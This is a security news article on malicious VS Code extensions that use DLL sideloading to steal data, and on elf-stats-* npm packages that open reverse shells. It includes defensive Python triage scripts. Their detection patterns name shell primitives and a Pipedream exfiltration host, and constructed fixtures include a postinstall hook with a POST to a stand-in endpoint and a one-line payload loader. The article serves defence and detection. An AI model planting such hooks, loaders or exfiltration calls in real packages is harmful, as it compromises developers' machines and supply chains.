Malicious Extensions Discovered on VS Code Marketplace Targeting Developers


By Tina Reynolds


Cybersecurity researchers last week found two malicious extensions in the Microsoft Visual Studio Code (VS Code) Marketplace, both purpose-built to compromise developer machines. One is marketed as a premium dark theme, the other as an AI-powered coding assistant. Behind those claimed features they are spyware: they can fetch and run additional payloads from a remote server, take screenshots of whatever the user has on screen, and steal sensitive data.

The two extensions, published as “BigBlack.bitcoin-black” and “Codo AI,” trade on the trust developers place in their tooling. Once installed, “BigBlack.bitcoin-black” executes whenever VS Code is in use, even though a colour theme is declarative and has no need to run code at all. “Codo AI,” by contrast, hides its malicious capabilities inside a largely functional assistant.

Covert Functionality and Data Theft

Both extensions abuse a legitimate Lightshot screenshot binary: they ship it together with a rogue library named “Lightshot.dll” so that the trusted executable loads the attacker’s code through DLL hijacking (also called DLL sideloading). Once loaded, the DLL collects clipboard contents, enumerates installed applications and running processes, captures screenshots of the desktop, and harvests saved Wi-Fi passwords and full system details from the infected machine.
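As an added illustration (not code from the article or from the researchers it cites), the following Python script triages a local VS Code extensions folder for the two traits just described. It assumes, since the article does not say, that “runs every time” corresponds to an `activationEvents` entry of `"*"` or `"onStartupFinished"`, and that a Lightshot-style sideload shows up as an `.exe` bundled next to a `.dll` inside the extension. The extension folders it scans are constructed in a temporary directory; on a real machine, point `scan_extensions_root` at `~/.vscode/extensions`.

```python
from __future__ import annotations

import json
import tempfile
from pathlib import Path

# Added example, not code from the article or the researchers it cites.
# Heuristics assumed here: activationEvents "*" / "onStartupFinished" as the
# "runs every time" mechanism, and an .exe bundled beside a .dll as the DLL
# sideloading indicator. The extension folders scanned are constructed below.

ALWAYS_ON = {"*", "onStartupFinished"}
NATIVE_SUFFIXES = {".exe", ".dll", ".node", ".scr"}


def scan_extension(ext_dir: Path) -> list[str]:
    """Return findings for one installed extension directory."""
    findings: list[str] = []
    manifest = ext_dir / "package.json"
    if not manifest.is_file():
        return [f"{ext_dir.name}: no package.json"]
    try:
        meta = json.loads(manifest.read_text(encoding="utf-8"))
    except json.JSONDecodeError:
        return [f"{ext_dir.name}: unparseable package.json"]

    always_on = set(meta.get("activationEvents", [])) & ALWAYS_ON
    if always_on:
        findings.append(f"{ext_dir.name}: activates on every session via {sorted(always_on)}")

    # A colour theme is declarative JSON; a theme that also declares an entry
    # point ("main") is shipping executable code it does not need.
    contributes = meta.get("contributes", {})
    if "themes" in contributes and meta.get("main"):
        findings.append(f"{ext_dir.name}: theme declares an entry point {meta['main']!r}")

    natives = [p for p in ext_dir.rglob("*") if p.suffix.lower() in NATIVE_SUFFIXES]
    for p in sorted(natives):
        findings.append(f"{ext_dir.name}: bundled native binary {p.relative_to(ext_dir)}")

    # Sideloading indicator: an executable with a DLL in the same folder. The
    # application directory comes first in the default DLL search order
    # (KnownDLLs aside), so a planted DLL wins over the system copy.
    for exe in (p for p in natives if p.suffix.lower() == ".exe"):
        dlls = sorted(d.name for d in exe.parent.iterdir() if d.suffix.lower() == ".dll")
        if dlls:
            findings.append(f"{ext_dir.name}: {exe.name} sits beside {dlls} (possible DLL sideloading)")
    return findings


def scan_extensions_root(root: Path) -> dict[str, list[str]]:
    """Scan every extension folder under root (e.g. ~/.vscode/extensions)."""
    return {d.name: scan_extension(d) for d in sorted(root.iterdir()) if d.is_dir()}


def build_fixture() -> Path:
    """Construct a throwaway extensions folder: one clean theme, one suspicious one."""
    root = Path(tempfile.mkdtemp(prefix="vsix-"))
    clean = root / "publisher.clean-theme-1.0.0"
    clean.mkdir()
    (clean / "package.json").write_text(json.dumps({
        "name": "clean-theme",
        "contributes": {"themes": [{"label": "Clean", "path": "./themes/clean.json"}]},
    }))
    # Folder name taken from the extension id in the article; contents are constructed.
    bad = root / "bigblack.bitcoin-black-1.0.0"
    (bad / "bin").mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "bitcoin-black",
        "main": "./out/extension.js",
        "activationEvents": ["*"],
        "contributes": {"themes": [{"label": "Bitcoin Black", "path": "./themes/bb.json"}]},
    }))
    (bad / "bin" / "Lightshot.exe").write_bytes(b"MZ")  # placeholder bytes, not a real PE
    (bad / "bin" / "Lightshot.dll").write_bytes(b"MZ")
    return root


if __name__ == "__main__":
    for ext, found in scan_extensions_root(build_fixture()).items():
        print(ext, "->", found or "clean")
```

The script is a triage aid, not a verdict: a legitimate extension may ship native helpers, and `onStartupFinished` is common in well-behaved tools. What should never look normal is a theme that declares `main`, activates on everything, and carries an executable with a same-named DLL beside it.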

Security researcher Idan Dardikman described the scope of the problem:

“A developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents, and browser sessions are being exfiltrated to a remote server.” – Idan Dardikman

Dardikman further emphasized the stealthy nature of these attacks, stating, “Your code. Your emails. Your Slack DMs. Whatever’s on your screen, they’re seeing it too.”

Attack Vectors in npm Packages

Researchers have also identified 420 distinct malicious npm packages attributed to the same suspected French-speaking threat actor who published the VS Code extensions. The packages follow a simple naming convention, elf-stats-*, and each contains code that can open a reverse shell and exfiltrate files to a Pipedream endpoint.

Kush Pandya, another security researcher, described how two of the packages split the loader from the payload:

“Finch-rust acts as a malware loader; it contains mostly legitimate code copied from the legitimate finch package but includes a single malicious line that loads and executes the sha-rust payload.” – Kush Pandya

This split defeats casual review: finch-rust looks innocuous when examined on its own, because almost all of its code really is the upstream finch code, while the actual malicious logic lives in sha-rust.
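The two npm patterns above, as an added example that is not code from the article or from the researchers: a static triage pass over installed packages that flags the elf-stats-* naming, install-time lifecycle scripts, contact with a Pipedream hostname and reverse-shell primitives, plus a diff of a suspect package against the upstream package it was copied from, which surfaces the single loader line that a read-through of the package on its own would miss. Assumptions not stated in the article: the exfiltration endpoint is a *.pipedream.net URL, the reverse shell is built on Node’s child_process/net modules, and the loader line is a plain `require()` of the payload package. All package contents are constructed fixtures.

```python
from __future__ import annotations

import difflib
import json
import re
import tempfile
from pathlib import Path

# Added example, not code from the article or the researchers it cites.
# Assumed indicators (not stated in the article): *.pipedream.net as the exfil
# host, Node child_process/net as the reverse-shell primitives, and a bare
# require() of the payload package as the loader line.

NAME_PATTERN = re.compile(r"^elf-stats-")  # naming convention reported in the article
EXFIL_HOST = re.compile(r"https?://[\w.-]*pipedream\.net", re.I)
SHELL_PRIMITIVES = re.compile(r"child_process|\.spawn\(|\.exec\(|net\.connect\(|/bin/sh|cmd\.exe")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def scan_package(pkg_dir: Path) -> list[str]:
    """Flag indicators in one installed npm package directory."""
    findings: list[str] = []
    meta = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8"))
    name = meta.get("name", pkg_dir.name)
    if NAME_PATTERN.match(name):
        findings.append(f"{name}: name matches the elf-stats-* campaign pattern")
    for hook in LIFECYCLE_HOOKS:
        if hook in meta.get("scripts", {}):
            findings.append(f"{name}: runs code at install time via '{hook}' script")
    for js in sorted(pkg_dir.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="replace")
        rel = js.relative_to(pkg_dir)
        for m in EXFIL_HOST.finditer(text):
            findings.append(f"{name}: {rel} contacts {m.group(0)}")
        if SHELL_PRIMITIVES.search(text):
            findings.append(f"{name}: {rel} uses shell/process primitives")
    return findings


def added_lines(upstream_dir: Path, suspect_dir: Path) -> dict[str, list[str]]:
    """Lines present in the suspect package's JS but absent from the upstream copy."""
    out: dict[str, list[str]] = {}
    for s in sorted(suspect_dir.rglob("*.js")):
        rel = s.relative_to(suspect_dir)
        u = upstream_dir / rel
        base = u.read_text(encoding="utf-8").splitlines() if u.is_file() else []
        diff = difflib.unified_diff(base, s.read_text(encoding="utf-8").splitlines(), lineterm="", n=0)
        extra = [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]
        if extra:
            out[str(rel)] = extra
    return out


def build_fixture() -> Path:
    """Construct a throwaway node_modules-style folder with three packages."""
    root = Path(tempfile.mkdtemp(prefix="npm-"))

    def write(name: str, files: dict[str, str], scripts: dict[str, str] | None = None) -> None:
        d = root / name
        d.mkdir()
        (d / "package.json").write_text(json.dumps(
            {"name": name, "version": "1.0.0", "scripts": scripts or {}}))
        for fn, body in files.items():
            (d / fn).write_text(body)

    legit = "module.exports = function finch(a, b) {\n  return a + b;\n};\n"
    write("finch", {"index.js": legit})
    # Loader: byte-for-byte the upstream code plus one line pulling in the payload.
    write("finch-rust", {"index.js": legit + "require('sha-rust')();\n"})
    # Constructed elf-stats-* member: install hook, shell primitives, Pipedream exfil.
    write("elf-stats-a", {"index.js":
        "const { spawn } = require('child_process');\n"
        "const net = require('net');\n"
        "fetch('https://example-endpoint.m.pipedream.net', { method: 'POST' });\n"},
        scripts={"postinstall": "node index.js"})
    return root


if __name__ == "__main__":
    root = build_fixture()
    for pkg in ("finch", "finch-rust", "elf-stats-a"):
        print(pkg, "->", scan_package(root / pkg) or "nothing flagged")
    print("finch-rust vs finch:", added_lines(root / "finch", root / "finch-rust"))
```

Run stand-alone, `scan_package` flags nothing in finch-rust, which is exactly Pandya’s point: the loader carries no indicator of its own. Only the diff against the upstream package exposes the added `require('sha-rust')();` line, which is why a copied-from-upstream comparison belongs in any review of a lookalike package, alongside the name and lifecycle-script checks.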

Implications for Developers

The impact of these extensions and packages goes beyond the data they exfiltrate. They compromise the integrity of development environments and, through them, the software supply chain. A developer who unknowingly installs one of them can leak proprietary source code, details about the projects they work on, and personal information.

The discovery is a reminder to treat extensions and packages as code you are choosing to execute. Check the publisher and install history before installing; look at what an extension activates on and whether it bundles native binaries; pin and audit dependencies rather than trusting a familiar-looking name; and watch developer machines for unexpected outbound connections. Regular third-party security audits and stronger controls are necessary against threats that hide in plain sight inside benign-looking code.
